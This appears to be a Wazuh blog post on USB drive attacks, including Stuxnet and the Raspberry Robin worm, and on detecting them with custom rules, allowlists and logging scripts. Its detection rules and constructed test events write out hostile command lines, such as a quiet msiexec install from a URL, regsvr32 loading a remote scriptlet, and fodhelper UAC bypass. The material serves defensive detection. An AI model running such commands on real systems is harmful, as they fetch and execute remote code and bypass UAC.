USB drive attacks represent a significant cybersecurity threat, taking advantage of the everyday use of USB devices to deliver malware and circumvent traditional network security measures. These attacks lead to data breaches, financial losses, and operational disruptions, with lasting impacts on an organization's reputation. An example is the Stuxnet worm discovered in 2010, malware designed to target industrial control systems, specifically Iran's nuclear enrichment facilities. It exploited multiple zero-day vulnerabilities and spread primarily through USB drives, making it one of the first examples of a cyberattack with real-world physical effects. Stuxnet exposed the risks of removable media and raised global awareness of cybersecurity threats to critical infrastructure.
How USB drive attacks propagate
Attackers use various methods to deliver malicious payloads via USB drives, targeting individuals and organizations.
- Drop attacks: Infected USB drives are deliberately left in public places, such as parking lots, to entice victims to plug them in and infect their computers.
- Mail-based attacks: USB drives are sent to targets by mail, disguised as promotional items or legitimate devices, to trick them into plugging them into their systems.
- Social engineering: Attackers use psychological tactics to persuade victims to connect infected USB drives to their computers.
- Unsolicited plugging: Attackers plug infected USB drives into unattended systems, spreading malware without victim interaction.
How USB drive attacks work
USB drive attacks typically follow a multi-step process to infiltrate systems and cause damage.
- Reconnaissance: Attackers research their target to identify potential vulnerabilities. In this case, they may gather information about the organization, its employees, and its operational environment to determine how likely someone is to use a USB drive.
- Weaponization: Threat actors prepare the USB drive by embedding malware. This can be done by directly infecting the drive or by crafting a seemingly benign file, such as a document, video, or image, that contains hidden malicious code.
- Delivery: Attackers distribute the infected USB drive to targets by dropping it in public places, giving it away as a promotional item, or using social engineering to deliver it.
- Exploitation: When the target connects the USB drive, the malware is activated automatically or through user interaction, exploiting system vulnerabilities.
- Installation: The malware is installed on the target system and gains persistence. This step allows the attacker to maintain control of the infected device even if it is rebooted or disconnected.
- Command and Control (C2): The malware communicates with the attacker's server. This enables the attacker to issue commands, exfiltrate data, or deploy additional payloads.
- Actions on Objectives: The attackers achieve their goals, such as stealing sensitive data, deploying ransomware, or establishing persistent access for future exploitation.
Figure 1: Steps showing how USB drive attacks work.
Improve your cybersecurity posture against USB drive attacks with Wazuh
Wazuh is an open source security platform that helps organizations detect and respond to security threats by monitoring system activities, from informational events to critical incidents. Organizations can proactively prevent breaches and safeguard sensitive data by monitoring USB activity with Wazuh.
Monitoring USB drive activities in Windows using Wazuh
Wazuh monitors USB drive activities on Windows endpoints using the Audit PNP Activity feature. This feature logs Plug and Play (PnP) events, which helps identify when USB drives are connected. It is available on Windows 10 Pro and Windows 11 Pro, Windows Server 2016, and later versions.
Organizations can configure Wazuh to detect specific system events and monitor USB-related events, focusing in particular on Windows event ID 6416, which is logged when an external device is connected. Security administrators can detect USB device connections by creating Wazuh custom rules that identify potential security incidents.
The next step consists of creating a Constant Database (CDB) list of the unique device identifiers (DeviceID) of approved devices. This list allows Wazuh to differentiate between authorized and unauthorized devices, generating alerts for both categories. For instance, when an authorized USB drive is plugged in, it triggers a lower-level alert, while an unauthorized connection generates a high-severity alert that indicates a potential security breach.
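The authorized/unauthorized split described above, as an added example that is not code from the Wazuh blog: a CDB-style allowlist of DeviceIDs is parsed, and each decoded event 6416 is classified the way a Wazuh rule pair using `<list lookup="match_key">` / `lookup="not_match_key">` on `win.eventdata.deviceId` would classify it. Field names follow Wazuh's JSON layout for Windows events (`win.system.*`, `win.eventdata.*`); the device ids, hostnames and the alert levels 5 and 12 are this example's own constructed choices.

```python
"""Classify Windows event 6416 (PnP device connected) against a CDB allowlist.

Added example, not the Wazuh blog's code. Device ids, hostnames and alert
levels are constructed; field names mirror Wazuh's decoded Windows events.
"""
import re

# Constructed allowlist in Wazuh CDB format: one "key:value" per line,
# '#' starts a comment. The key is the DeviceID, the value a free-form label.
CDB_TEXT = r"""
# approved removable drives (constructed sample data)
USB\VID_1234&PID_5678\CONSTRUCTED0001:finance-backup-key
USB\VID_1234&PID_5678\CONSTRUCTED0002:it-admin-key
"""

LEVEL_AUTHORIZED = 5     # assumed: low-level alert, still recorded for audit
LEVEL_UNAUTHORIZED = 12  # assumed: high severity, potential policy breach


def parse_cdb(text):
    """Parse CDB list text into {key: value}.

    The key ends at the first ':' (DeviceIDs contain '\\' and '&' but never
    ':'); blank lines and '#' comments are skipped.
    """
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        entries[key.strip()] = value.strip()
    return entries


def classify_usb_event(event, allowlist):
    """Return an alert dict for a USB-bus 6416 event, or None for anything else."""
    win = event.get("win", {})
    system = win.get("system", {})
    data = win.get("eventdata", {})
    if str(system.get("eventID")) != "6416":
        return None
    device_id = data.get("deviceId", "")
    # 6416 fires for every PnP node (hub, HID, disk, volume); keep USB-bus ids only.
    if not re.match(r"^(USB|USBSTOR)\\", device_id, re.IGNORECASE):
        return None
    label = allowlist.get(device_id)  # exact key match, like lookup="match_key"
    authorized = label is not None
    return {
        "computer": system.get("computer", "unknown"),
        "device_id": device_id,
        "description": data.get("deviceDescription", ""),
        "authorized": authorized,
        "label": label,
        "level": LEVEL_AUTHORIZED if authorized else LEVEL_UNAUTHORIZED,
    }


def triage(events, allowlist):
    """Classify a batch of events; return (authorized, unauthorized) alert lists."""
    results = [r for r in (classify_usb_event(e, allowlist) for e in events) if r]
    return ([r for r in results if r["authorized"]],
            [r for r in results if not r["authorized"]])


def _event(event_id, device_id, description):
    """Build a constructed event shaped like the agent's decoded Windows JSON."""
    return {"win": {"system": {"eventID": event_id, "computer": "WS-CONSTRUCTED-01"},
                    "eventdata": {"deviceId": device_id, "deviceDescription": description}}}


# Constructed sample events: approved drive, unknown drive, a HID node, a logon.
SAMPLE_EVENTS = [
    _event("6416", r"USB\VID_1234&PID_5678\CONSTRUCTED0001", "USB Mass Storage Device"),
    _event("6416", r"USB\VID_ABCD&PID_0001\CONSTRUCTED9999", "USB Mass Storage Device"),
    _event("6416", r"HID\VID_1234&PID_0002\7&1a2b3c4d&0&0000", "HID Keyboard Device"),
    _event("4624", "", ""),
]

if __name__ == "__main__":
    ok, bad = triage(SAMPLE_EVENTS, parse_cdb(CDB_TEXT))
    for r in ok + bad:
        status = "authorized" if r["authorized"] else "UNAUTHORIZED"
        print(f"level {r['level']:2d} {status:12s} {r['computer']} {r['device_id']}")
```

Keep the list keyed on the full DeviceID (bus, VID/PID and serial): matching on the vendor and product id alone would authorize every drive of the same model.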
Figure 2: USB drive plug-in events on a monitored Windows endpoint.
Figure 3: Authorized USB drive event.
Figure 4: Unauthorized USB drive event.
Threat detection use case: Detecting Raspberry Robin USB drive activities
Wazuh provides a way to mitigate USB-related threats such as Raspberry Robin, a Windows-based worm.
Raspberry Robin targets industries like oil, gas, transportation, and tech, causing operational disruptions. It spreads via disguised .lnk files, gains persistence by updating the UserAssist registry key, and mimics legitimate folders. The worm uses legitimate Windows processes such as msiexec.exe, rundll32.exe, odbcconf.exe, and fodhelper.exe to execute, persist, and download additional malicious components. Its reliance on TOR-based command and control (C2) servers for outbound communication adds stealth and complicates detection.
Wazuh detects Raspberry Robin by monitoring registry modifications, unusual command execution patterns, and suspicious use of system binaries. Its real-time file integrity monitoring and threat detection rules identify malicious activity, enabling a swift response that mitigates potential disruptions.
Wazuh detects and mitigates Raspberry Robin by monitoring and responding to suspicious activity such as:
- Anomalous cmd.exe activity: terminating suspicious processes or isolating affected endpoints.
- Flagging msiexec.exe downloads from obscure domains, blocking the connections, and alerting administrators.
- Detecting UAC bypass via fodhelper.exe, terminating the process, and notifying administrators.
- Blocking unusual outbound connections by rundll32.exe and dllhost.exe.
Below is a sample custom rule configuration that detects possible Raspberry Robin activities.
```xml
<group name="windows,sysmon,raspberry_robin,">
  <!-- Rule ids and alert levels are not given on this page: CUSTOM_ID_1..4 are
       placeholders to replace with unused ids from the custom range (100000 and
       above), and the levels are assumed. Field names follow Wazuh's Sysmon
       event 1 decoder (win.eventdata.image, commandLine, parentImage). -->
  <rule id="CUSTOM_ID_1" level="12">
    <if_sid>92004</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)cmd.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)cmd.exe.+((/r)|(/v.+/c)|(/c)).*cmd</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
    <mitre>
      <id>T1059.003</id>
    </mitre>
  </rule>

  <rule id="CUSTOM_ID_2" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)msiexec.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+[.msi]{0,1}</field>
    <description>msiexec.exe downloading and executing packages on $(win.system.computer)</description>
    <mitre>
      <id>T1218.007</id>
    </mitre>
  </rule>

  <rule id="CUSTOM_ID_3" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.parentImage" type="pcre2">(?i)(cmd|powershell|rundll32).exe</field>
    <field name="win.eventdata.image" type="pcre2">(?i)fodhelper.exe</field>
    <description>Use of fodhelper.exe to bypass UAC on $(win.system.computer)</description>
    <mitre>
      <id>T1548.002</id>
    </mitre>
  </rule>

  <rule id="CUSTOM_ID_4" level="12">
    <if_sid>61603</if_sid>
    <!-- The literal parentheses of write() / GetObject( / Exec() are escaped:
         left bare, "()" is an empty group and the pattern can never match. -->
    <field name="win.eventdata.commandLine" type="pcre2">(regsvr32.exe|rundll32.exe|dllhost.exe).*";document.write\(\);GetObject\("script:.*\).Exec\(\)</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
    <mitre>
      <id>T1218.011</id>
    </mitre>
  </rule>
</group>
```
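To check what those four field patterns actually match before loading them on a manager, here is an added example (not the Wazuh blog's code) that applies them to constructed Sysmon event 1 records the way Wazuh evaluates `<field type="pcre2">` (an unanchored search, all fields of a rule must match) and expands `$(win.system.computer)` in the description. Field names follow Wazuh's Sysmon decoder; the hostname, the `example.invalid` URLs and every command line are constructed for the test.

```python
"""Evaluate the Raspberry Robin field patterns over constructed Sysmon events.

Added example, not the Wazuh blog's code. Events, hostnames and URLs are
constructed; field names mirror Wazuh's Sysmon event 1 decoder.
"""
import re

# (description, MITRE id, {field: pcre2 pattern}); every field must match.
# The literal parentheses in the last pattern are escaped; bare "()" is an
# empty group, so "document.write();" could never match otherwise.
RULES = [
    ("Possible Raspberry Robin execution on $(win.system.computer)", "T1059.003",
     {"win.eventdata.image": r"(?i)cmd.exe$",
      "win.eventdata.commandLine": r"(?i)cmd.exe.+((/r)|(/v.+/c)|(/c)).*cmd"}),
    ("msiexec.exe downloading and executing packages on $(win.system.computer)", "T1218.007",
     {"win.eventdata.image": r"(?i)msiexec.exe$",
      "win.eventdata.commandLine":
          r"(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+[.msi]{0,1}"}),
    ("Use of fodhelper.exe to bypass UAC on $(win.system.computer)", "T1548.002",
     {"win.eventdata.parentImage": r"(?i)(cmd|powershell|rundll32).exe",
      "win.eventdata.image": r"(?i)fodhelper.exe"}),
    ("Possible Raspberry Robin execution on $(win.system.computer)", "T1218.011",
     {"win.eventdata.commandLine":
          r'(regsvr32.exe|rundll32.exe|dllhost.exe).*";document.write\(\);GetObject\("script:.*\).Exec\(\)'}),
]


def lookup(event, dotted):
    """Resolve a dotted field name ("win.eventdata.image") in a nested dict."""
    node = event
    for part in dotted.split("."):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node


def field_matches(event, name, pattern):
    """Wazuh field semantics: the field must exist and the regex may match anywhere."""
    value = lookup(event, name)
    return isinstance(value, str) and re.search(pattern, value) is not None


def expand(template, event):
    """Replace $(a.b.c) with the event's value, like Wazuh's dynamic descriptions."""
    return re.sub(r"\$\(([\w.]+)\)",
                  lambda m: str(lookup(event, m.group(1)) or ""), template)


def evaluate(event):
    """Return [(expanded description, MITRE id)] for every rule whose fields all match."""
    return [(expand(description, event), mitre)
            for description, mitre, fields in RULES
            if all(field_matches(event, name, pattern) for name, pattern in fields.items())]


def sysmon_event(image, command_line, parent_image, computer="WS-CONSTRUCTED-01"):
    """Constructed record shaped like Wazuh's decoded Sysmon event 1."""
    return {"win": {"system": {"eventID": "1", "computer": computer},
                    "eventdata": {"image": image, "commandLine": command_line,
                                  "parentImage": parent_image}}}


SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    # 0: cmd.exe spawning a second cmd via /c  -> rule 1
    sysmon_event(SYS32 + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c cmd /v:on',
                 r"C:\Windows\explorer.exe"),
    # 1: quiet msiexec install straight from a URL -> rule 2
    sysmon_event(SYS32 + r"\msiexec.exe",
                 "msiexec.exe /q /i https://example.invalid/update.msi", SYS32 + r"\cmd.exe"),
    # 2: fodhelper.exe launched from cmd.exe -> rule 3
    sysmon_event(SYS32 + r"\fodhelper.exe", "fodhelper.exe", SYS32 + r"\cmd.exe"),
    # 3: the scriptlet-loading command line the fourth pattern describes -> rule 4
    sysmon_event(SYS32 + r"\regsvr32.exe",
                 r'regsvr32.exe /s /u /i:";document.write();GetObject("script:https://example.invalid/x.sct").Exec()',
                 SYS32 + r"\cmd.exe"),
    # 4: plain cmd.exe /c dir: no nested cmd, so rule 1 stays quiet
    sysmon_event(SYS32 + r"\cmd.exe", "cmd.exe /c dir", r"C:\Windows\explorer.exe"),
    # 5: unrelated process
    sysmon_event(SYS32 + r"\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for i, event in enumerate(SAMPLE_EVENTS):
        print(i, evaluate(event) or "no match")
```

Events 4 and 5 are the useful part of the run: a rule set that fires on every `cmd.exe /c` would drown the alerts the page is after, so negative samples belong in the check as much as positive ones.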
Figure 5: Raspberry Robin IoCs and behaviors detected on a monitored Windows endpoint.
Figure 6: An alert showing the Raspberry Robin IoCs detected on a monitored Windows endpoint.
For more details on detecting the Raspberry Robin worm using Wazuh, please see this blog post.
Monitoring USB drives in Linux using Wazuh
USB drives can also introduce security risks to Linux endpoints as potential vectors for malware and unauthorized data access. udev is a Linux system utility that automatically detects and manages external devices, such as USB drives, when they are plugged in. It creates the required device files in the /dev directory so that the system can interact with them. Administrators can create custom udev rules that generate detailed events, providing insight into USB activity. Wazuh has built-in rules for USB monitoring, but udev-generated events provide richer details, enhancing threat detection.
We configure udev rules on our Linux endpoints to trigger a logging script whenever a USB device is connected. The Wazuh agent must be set up to read the JSON log file produced by the logging script, allowing it to process and analyze USB activity.
Similar to the Windows USB drive monitoring, you need a constant database (CDB) list of authorized USB device serial numbers. Wazuh compares incoming connections against this list, triggering alerts for unauthorized devices.
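The logging script and udev rule described above, as an added example that is not the Wazuh blog's own script: udev runs the script with the device properties in its environment (`ACTION`, `DEVNAME`, `ID_BUS`, `ID_VENDOR_ID`, `ID_MODEL_ID`, `ID_SERIAL_SHORT`, `ID_VENDOR`, `ID_MODEL`, all real udev properties), and the script appends one JSON object per line to a file that the agent reads with `<log_format>json</log_format>`. The rule file name, the script path, the log path and the `usb_event` key are this example's assumptions.

```python
#!/usr/bin/env python3
"""udev-triggered USB logger producing one JSON line per event.

Added example, not the Wazuh blog's script. Paths are assumptions.

Assumed udev rule, /etc/udev/rules.d/90-usb-log.rules (one line):
  ACTION=="add|remove", SUBSYSTEM=="block", ENV{ID_BUS}=="usb", \
      ENV{DEVTYPE}=="disk", RUN+="/usr/local/bin/usb_log.py"
"""
import json
import os
import socket
import sys
from datetime import datetime, timezone

LOG_PATH = "/var/log/usb-events.json"  # assumed; must be readable by the agent

# JSON key -> udev property. Nested under "usb_event" so Wazuh rules can use
# field names such as usb_event.action and usb_event.serial.
FIELDS = {
    "action": "ACTION",            # add | remove
    "device": "DEVNAME",           # e.g. /dev/sdb
    "vendor_id": "ID_VENDOR_ID",   # USB VID, hex
    "product_id": "ID_MODEL_ID",   # USB PID, hex
    "serial": "ID_SERIAL_SHORT",   # what the CDB list is keyed on
    "vendor": "ID_VENDOR",
    "model": "ID_MODEL",
}


def is_usb_block_device(env):
    """Defense in depth behind the udev match: whole USB disks only."""
    return env.get("ID_BUS") == "usb" and env.get("DEVTYPE", "disk") == "disk"


def build_record(env, now=None):
    """Turn udev's environment into a JSON-ready dict.

    Missing properties become "unknown" instead of raising: a remove event may
    lack some of them, and a disconnect must still be logged.
    """
    when = now or datetime.now(timezone.utc)
    fields = {key: env.get(var, "unknown") for key, var in FIELDS.items()}
    fields["timestamp"] = when.isoformat()
    fields["hostname"] = socket.gethostname()
    return {"usb_event": fields}


def append_record(record, path=LOG_PATH):
    """Append one compact JSON line (the shape the agent's json log format expects)."""
    line = json.dumps(record, separators=(",", ":"))
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(line + "\n")
    return line


# Constructed environment, used for the --demo run without a real device.
SAMPLE_ENV = {
    "ACTION": "add", "DEVNAME": "/dev/sdb", "ID_BUS": "usb", "DEVTYPE": "disk",
    "ID_VENDOR_ID": "1234", "ID_MODEL_ID": "5678", "ID_SERIAL_SHORT": "CONSTRUCTED0001",
    "ID_VENDOR": "ConstructedVendor", "ID_MODEL": "Constructed_Drive",
}


def main(argv):
    if "--demo" in argv:
        print(json.dumps(build_record(SAMPLE_ENV), separators=(",", ":")))
        return 0
    if not is_usb_block_device(os.environ):
        return 0  # udev matched something broader than a USB disk; nothing to log
    append_record(build_record(os.environ))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

After installing the script, reload the rules with `udevadm control --reload-rules`, then point the agent at the file with a `<localfile>` block whose `<log_format>` is `json` and whose `<location>` is the log path; the `usb_event.serial` field is what the CDB lookup on the manager compares against.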
Figure 7: USB drive alerts for a monitored Linux endpoint.
Figure 8: An unauthorized USB drive event on a monitored Linux endpoint.
The blog post on Monitoring USB drives in Linux using Wazuh provides more information on monitoring USB drives plugged into Linux endpoints.
Monitoring USB drives in macOS using Wazuh
You can use a custom script to log important USB device events on macOS endpoints and then configure Wazuh to monitor those events. Administrators can extract information such as connection and disconnection events, vendor IDs, product IDs, and serial numbers of the USB drives plugged in. The script interacts with macOS's I/O Kit framework to gather USB device information, which is then formatted as JSON and saved to a log file. The Wazuh agent sends the log data generated by this custom script to the Wazuh server for analysis.
The blog post on Monitoring USB drives in macOS using Wazuh shows the steps to monitor USB drives on macOS endpoints.
Figure 9: USB drive alerts on a monitored macOS endpoint.
Figure 10: Unauthorized USB drive alert on a monitored macOS endpoint.
Conclusion
USB drive attacks pose a security risk across all major operating systems, enabling malware propagation and giving malicious actors unauthorized access.
Wazuh offers various detection mechanisms that increase the chances of detecting USB drive attacks and mitigating their potential impact. Organizations can improve their cybersecurity by integrating these detection methods and enforcing strict USB access policies.